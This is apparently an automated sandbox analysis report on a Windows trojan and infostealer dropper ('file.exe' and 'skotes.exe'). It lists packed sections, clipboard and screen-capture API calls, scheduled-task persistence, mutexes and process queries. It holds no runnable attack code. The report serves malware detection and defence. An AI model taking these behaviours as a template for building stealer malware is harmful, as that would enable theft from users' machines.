Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Code function: 11_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

11_2_00431A30

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Code function: 11_2_00431BB0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

11_2_00431BB0

System Summary

Binary is likely a compiled AutoIt script file

Source: 5cbc6b58d3.exe, 00000018.00000002.3365184052.0000000000692000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_2eda2552-9
Source: 5cbc6b58d3.exe, 00000018.00000002.3365184052.0000000000692000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_75a92834-3

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: 4b8eda303b.exe.6.dr	Static PE information: section name:
Source: 4b8eda303b.exe.6.dr	Static PE information: section name: .idata
Source: 4b8eda303b.exe.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: 2656cd82fe.exe.6.dr	Static PE information: section name:
Source: 2656cd82fe.exe.6.dr	Static PE information: section name: .idata
Source: 2656cd82fe.exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: ccdb824191.exe.6.dr	Static PE information: section name:
Source: ccdb824191.exe.6.dr	Static PE information: section name: .idata
Source: ccdb824191.exe.6.dr	Static PE information: section name:
Source: random[2].exe0.6.dr	Static PE information: section name:
Source: random[2].exe0.6.dr	Static PE information: section name: .idata
Source: random[2].exe0.6.dr	Static PE information: section name:
Source: cd39094ad6.exe.6.dr	Static PE information: section name:
Source: cd39094ad6.exe.6.dr	Static PE information: section name: .idata
Source: cd39094ad6.exe.6.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB78BB	0_2_00DB78BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB7049	0_2_00DB7049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB8860	0_2_00DB8860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB31A8	0_2_00DB31A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D74B30	0_2_00D74B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D74DE0	0_2_00D74DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB2D10	0_2_00DB2D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB779B	0_2_00DB779B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA7F36	0_2_00DA7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF78BB	2_2_00FF78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF8860	2_2_00FF8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF7049	2_2_00FF7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF31A8	2_2_00FF31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FB4B30	2_2_00FB4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FB4DE0	2_2_00FB4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF2D10	2_2_00FF2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FF779B	2_2_00FF779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FE7F36	2_2_00FE7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF78BB	3_2_00FF78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF8860	3_2_00FF8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF7049	3_2_00FF7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF31A8	3_2_00FF31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FB4B30	3_2_00FB4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FB4DE0	3_2_00FB4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF2D10	3_2_00FF2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FF779B	3_2_00FF779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FE7F36	3_2_00FE7F36
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004E17D0	7_2_004E17D0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004E1000	7_2_004E1000
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004F1A10	7_2_004F1A10
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004E5C52	7_2_004E5C52
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004E3C05	7_2_004E3C05
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004F0422	7_2_004F0422
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004F566E	7_2_004F566E
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004E1000	9_2_004E1000
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004F1A10	9_2_004F1A10
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004E5C52	9_2_004E5C52
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004E3C05	9_2_004E3C05
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004F0422	9_2_004F0422
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004F566E	9_2_004F566E
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004E17D0	9_2_004E17D0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0040A960	11_2_0040A960
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004087F0	11_2_004087F0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00425F7D	11_2_00425F7D
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00409070	11_2_00409070
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043A030	11_2_0043A030
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004038C0	11_2_004038C0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004380D9	11_2_004380D9
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0041D8E0	11_2_0041D8E0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0042D085	11_2_0042D085
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004280B0	11_2_004280B0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00426170	11_2_00426170
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0042297F	11_2_0042297F
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0042A100	11_2_0042A100
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00437900	11_2_00437900
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00416E97	11_2_00416E97
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00405910	11_2_00405910
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00425920	11_2_00425920
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004301D0	11_2_004301D0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004081F0	11_2_004081F0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00408990	11_2_00408990
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00417190	11_2_00417190
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00414A40	11_2_00414A40
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0041BA48	11_2_0041BA48
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0040CA54	11_2_0040CA54
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00404270	11_2_00404270
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00422270	11_2_00422270
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00406200	11_2_00406200
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00423A00	11_2_00423A00
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043CAC0	11_2_0043CAC0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043E2C0	11_2_0043E2C0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004292D0	11_2_004292D0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00415ADC	11_2_00415ADC
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0042BA8D	11_2_0042BA8D
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0040E2A9	11_2_0040E2A9
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004192BA	11_2_004192BA
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0040B351	11_2_0040B351
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0041CB5A	11_2_0041CB5A
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00409360	11_2_00409360
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0041C360	11_2_0041C360
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00416B7E	11_2_00416B7E
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00411B1B	11_2_00411B1B
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043533A	11_2_0043533A
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043CBD6	11_2_0043CBD6
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043A3F0	11_2_0043A3F0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00439B90	11_2_00439B90
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00404BA0	11_2_00404BA0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004233A0	11_2_004233A0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00436C40	11_2_00436C40
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0040D44C	11_2_0040D44C
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00434C4D	11_2_00434C4D
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00407470	11_2_00407470
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00419C10	11_2_00419C10
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00418C1E	11_2_00418C1E
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0041D420	11_2_0041D420
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0041DC20	11_2_0041DC20
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00436430	11_2_00436430
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043CCE0	11_2_0043CCE0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043DCF0	11_2_0043DCF0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00422CF8	11_2_00422CF8
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00427C9D	11_2_00427C9D
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043CD60	11_2_0043CD60
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00416571	11_2_00416571
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00424D70	11_2_00424D70
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00423D30	11_2_00423D30
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004215F0	11_2_004215F0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0041DE40	11_2_0041DE40
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00423E4B	11_2_00423E4B
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00405E60	11_2_00405E60
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00412670	11_2_00412670
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00425670	11_2_00425670
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0041AE00	11_2_0041AE00
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043CE00	11_2_0043CE00
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00423E30	11_2_00423E30
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004156D0	11_2_004156D0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0042C6D7	11_2_0042C6D7
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00415EE0	11_2_00415EE0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004266E7	11_2_004266E7
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00406690	11_2_00406690
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043E690	11_2_0043E690
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00436690	11_2_00436690
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00416E97	11_2_00416E97
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00402EA0	11_2_00402EA0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004376B0	11_2_004376B0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00426EBE	11_2_00426EBE
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00428F5D	11_2_00428F5D
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0042B763	11_2_0042B763
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00425F7D	11_2_00425F7D
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00414F08	11_2_00414F08
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00420717	11_2_00420717
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00418731	11_2_00418731
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0041EF30	11_2_0041EF30
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0042BFD3	11_2_0042BFD3
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00410FD6	11_2_00410FD6
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0042BFDA	11_2_0042BFDA
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00436F90	11_2_00436F90
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004167A5	11_2_004167A5
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00418FAD	11_2_00418FAD
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_004097B0	11_2_004097B0
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043DFB0	11_2_0043DFB0

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00D880C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: String function: 004E3BC0 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: String function: 004E9DFF appears 36 times
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: String function: 00414A30 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: String function: 00408000 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FCDF80 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00FC80C0 appears 260 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9983076464577657
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9983076464577657
Source: random[1].exe.6.dr	Static PE information: Section: xtfxuijo ZLIB complexity 0.9943038403088318
Source: 4b8eda303b.exe.6.dr	Static PE information: Section: xtfxuijo ZLIB complexity 0.9943038403088318
Source: random[1].exe0.6.dr	Static PE information: Section: ipikowml ZLIB complexity 0.9943743274748924
Source: 2656cd82fe.exe.6.dr	Static PE information: Section: ipikowml ZLIB complexity 0.9943743274748924
Source: random[1].exe2.6.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: random[1].exe2.6.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: d1834e5726.exe.6.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: d1834e5726.exe.6.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: random[2].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9974716395547946
Source: random[2].exe.6.dr	Static PE information: Section: zvacajzt ZLIB complexity 0.9947201236263736
Source: ccdb824191.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9974716395547946
Source: ccdb824191.exe.6.dr	Static PE information: Section: zvacajzt ZLIB complexity 0.9947201236263736
Source: random[2].exe0.6.dr	Static PE information: Section: qlmsecti ZLIB complexity 0.9947330881814185
Source: cd39094ad6.exe.6.dr	Static PE information: Section: qlmsecti ZLIB complexity 0.9947330881814185

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@103/24@93/19

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Code function: 11_2_00430A6C CoCreateInstance,

11_2_00430A6C

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\SyncRootManager
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

